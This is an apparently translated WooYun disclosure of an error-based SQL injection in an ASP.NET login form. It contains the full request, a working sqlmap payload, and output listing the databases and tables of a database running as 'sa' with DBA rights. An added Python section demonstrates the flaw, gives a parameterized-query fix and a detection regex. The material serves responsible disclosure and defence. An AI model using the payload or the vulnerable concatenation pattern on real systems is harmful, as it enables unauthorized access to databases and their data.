WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-10-16: Details sent to the vendor, awaiting vendor handling
2015-10-20: Vendor has confirmed; details disclosed to the vendor only
2015-10-30: Details disclosed to core white hats and relevant domain experts
2015-11-09: Details disclosed to regular white hats
2015-11-19: Details disclosed to intern white hats
2015-12-04: Details disclosed to the public
As the title says.
The login page at http://**.**.**.**/fzbzgzj/login.aspx is vulnerable to SQL injection. Injected parameter: txt_UserName
POST /fzbzgzj/login.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://**.**.**.**/fzbzgzj/login.aspx
Cookie: ASP.NET_SessionId=sfqdwy45rv2yhr554ybza445
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 352

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=DLDTgWbWOjna7vMb3Fjz8pL9VR1exguHe%2F9sMbYMyJJp%2FXmBgxXVe%2Bw797VuaL55DCT61ECGAvEYDFiWik6lfFhfVALW1OsQbxXWaWZJbHSKob5SakRg96fv893KoxBfaUOdh67uuChrG%2BfBi4fbSUDIQR7O9gtiiOSpJf%2FBc%2BcKgZmTqPbjWp1UzSTEqbSq853G%2BA%3D%3D&txt_UserName=admin&txt_PassWord=123456&txt_SerialNumber=y6fz&btn_Login.x=66&btn_Login.y=6
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txt_UserName
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=lLnnV5NTKs8RQeHVCWY08ks8CwO1sVML/RUis80Jtu3DJ1Jy8RRAjCmIL7AWLggHSWVDR4qGya7+8N2oQ/4lnKC2jlPL8okxttBnwup+L2Jw9QONjVGwRP7JYE/gzphWs3Q4QTVLytRVbAm3wUlajW7bPUA7LMLKdzGwoK4Lsj7IA6FiyyYmUx4t/YVrmgTFHPy7ow==&txt_UserName=admin' AND 3611=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(111)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (3611=3611) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(100)+CHAR(110)+CHAR(113))) AND 'RoWc'='RoWc&txt_PassWord=123456&txt_SerialNumber=y6fz&btn_Login.x=66&btn_Login.y=6
---
[14:58:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:58:08] [INFO] fetching current user
[14:58:09] [WARNING] reflective value(s) found and filtering out
[14:58:09] [INFO] retrieved: sa
current user: 'sa'
[14:58:09] [INFO] fetching current database
[14:58:10] [INFO] retrieved: FZBWB
current database: 'FZBWB'
[14:58:10] [INFO] testing if current user is DBA
current user is DBA: True
[14:58:11] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/**.**.**.**'
Databases:
available databases [10]:
[*] FZBWB
[*] fzbwbxt
[*] fzbwsbb
[*] fzbzgzj
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Tables:
Database: ReportServerTempDB
[9 tables]
+-------------------------+
| ChunkData               |
| ChunkSegmentMapping     |
| ExecutionCache          |
| PersistedStream         |
| Segment                 |
| SegmentedChunk          |
| SessionData             |
| SessionLock             |
| SnapshotData            |
+-------------------------+
Database: FZBWB
[100 tables]
+-------------------------+
| AdministrationArea      |
| AdministrationUnit      |
| AffairAction            |
| AffairBase              |
| AffairEndDateSet        |
| AffairSequence          |
| AffairSubFunc           |
| AffairType              |
| AffairWaitStart         |
| Annex                   |
| AnnexType               |
| BaseDataBasic           |
| BaseDataType            |
| BaseDataUIConfig        |
| BreakDate               |
| CalendarProgram         |
| Certificate             |
| CertificateChangeApply  |
| CertificateEnd          |
| CertificateEndDetail    |
| CertificateReissueApply |
| ChildFunction           |
| CodeControl             |
| CodeControl2            |
| CodeControl3            |
| ComTaskGroup            |
| CommPhrase              |
| CommPhraseGroup         |
| CommReceiver            |
| CommTask                |
| CompetencyApply         |
| CompetencyApplyDetail   |
| ConsumerList            |
| DataItem                |
| DataItemReEntity        |
| DataItemType            |
| DataItemView            |
| DataPurview             |
| DataTypeColl            |
| DataViewCol             |
| DataViewQrCol           |
| DataViewSort            |
| DateDetail              |
| DayRule                 |
| DelayRecord             |
| Department              |
| Dept                    |
| DeptTemplate            |
| DetailPurview           |
| DispDocSign             |
| DispDocSignSet          |
| EasyReportCell          |
| EasyReportCol           |
| EasyReportDataRow       |
| EasyReportRow           |
| EasyReportTable         |
| Entity                  |
| EntityField             |
| EntityFieldExpand       |
| ExpandItems             |
| ExpandList              |
| FileICP                 |
| FileRegister            |
| FileType                |
| Im_friendItems          |
| Im_groupInfo            |
| Im_groupItems           |
| Im_groupOfflineMessage  |
| Im_offlineMessage       |
| Inbox                   |
| InsRelation             |
| InstitutionRelMode      |
| InstitutionType         |
| LawOffice               |
| LogicGroup              |
| LoginInfo               |
| MDFunc                  |
| MDInfo                  |
| ManageCor               |
| MdPackage               |
| Member                  |
| MemberInLogicGroup      |
| MemberRoleRelation      |
| MonthDayRule            |
| MonthWeekRule           |
| MsgSign                 |
| OfferCheck              |
| Organization            |
| OrganizeConfig          |
| OrganizeType            |
| PackageFuns             |
| Parameter               |
| PerYear                 |
| QScheme                 |
| QSchemeSub              |
| RegICPFile              |
| RegistrationApply       |
| RegistrationApplyDetail |
| RepSavedResult          |
| ReportsCol              |
+-------------------------+
[14:59:35] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/**.**.**.**'
Vulnerability proven to exist; did not go any further.
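The sqlmap output above shows the classic shape of an error-based injection: a quote closes the UserName string literal, an AND clause makes the DBMS evaluate an expression, and the resulting database error carries the answer back. The Python below is an added example written for this page, not code from the report or from the affected site. It reproduces the defect with an in-memory SQLite table standing in for the site's LoginInfo table (the UserName/PassWord column names are assumed from the form field names, the real application's query and error handling are unknown), shows the parameterized query that removes it, and includes a narrow detection signature for the quote-break-plus-function-call pattern in captured POST bodies. The request bodies and the __VIEWSTATE value are constructed placeholders.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlencode

# Constructed injection value, shortened from the txt_UserName payload in the
# report: the quote leaves the string literal, the AND clause makes the database
# evaluate CONVERT() so that its error text reports back, and the trailing
# AND 'RoWc'='RoWc re-balances the quotes.
PAYLOAD = "admin' AND 3611=CONVERT(INT,(SELECT CHAR(113))) AND 'RoWc'='RoWc"

# Constructed request bodies modelled on the POST in the report.
# The __VIEWSTATE value is a placeholder, not a real one.
BENIGN_BODY = urlencode({
    "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": "VIEWSTATE_PLACEHOLDER",
    "txt_UserName": "admin", "txt_PassWord": "123456", "txt_SerialNumber": "y6fz",
})
INJECTED_BODY = urlencode({
    "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": "VIEWSTATE_PLACEHOLDER",
    "txt_UserName": PAYLOAD, "txt_PassWord": "123456", "txt_SerialNumber": "y6fz",
})


def build_db():
    """In-memory stand-in for the site's LoginInfo table (column names assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE LoginInfo (UserName TEXT, PassWord TEXT)")
    conn.execute("INSERT INTO LoginInfo VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def login_concat(conn, username, password):
    """Vulnerable pattern: user input spliced into the SQL text."""
    sql = ("SELECT UserName FROM LoginInfo WHERE UserName='" + username
           + "' AND PassWord='" + password + "'")
    return conn.execute(sql).fetchone()


def login_concat_outcome(conn, username, password):
    """Run the vulnerable query and report whether the DBMS raised an error.

    Error-based injection depends on exactly this: the malformed query reaches
    the database, and the error (a SQLite one here, MSSQL in the report) is what
    carries data back once the application echoes it to the client."""
    try:
        return ("ok", login_concat(conn, username, password))
    except sqlite3.Error as exc:
        return ("error", str(exc))


def login_param(conn, username, password):
    """Fixed pattern: values travel as bound parameters, never as SQL syntax.
    The payload is compared as a literal username and matches no row."""
    sql = "SELECT UserName FROM LoginInfo WHERE UserName=? AND PassWord=?"
    return conn.execute(sql, (username, password)).fetchone()


# Detection side: a hypothetical signature (not from any product) for the
# quote-break followed by a SQL function call, the shape of the reported payload.
INJECTION_MARKERS = re.compile(
    r"'\s*(AND|OR)\b.*\b(CONVERT|CHAR|SELECT|CASE)\s*\(",
    re.IGNORECASE | re.DOTALL,
)


def flag_request(body):
    """Return the names of form fields whose decoded values match the signature."""
    fields = parse_qs(body, keep_blank_values=True)
    return [name for name, values in fields.items()
            if any(INJECTION_MARKERS.search(v) for v in values)]


if __name__ == "__main__":
    conn = build_db()
    print("parameterized, payload:", login_param(conn, PAYLOAD, "123456"))
    print("concatenated, payload :", login_concat_outcome(conn, PAYLOAD, "123456"))
    print("flagged fields        :", flag_request(INJECTED_BODY))
```

The signature is deliberately narrow so it can be run over stored POST bodies without drowning in false positives from apostrophes in ordinary names; it is a triage aid for finding this campaign in logs, not a substitute for the parameterized query, and the fix should be paired with a non-`sa` database login and with detailed DBMS errors turned off in the application's responses.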
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-10-20 16:55
CNVD confirmed and reproduced the described vulnerability and has handed it to CNCERT for dispatch to the corresponding sub-center, which will coordinate handling with the website's operating unit.
None yet.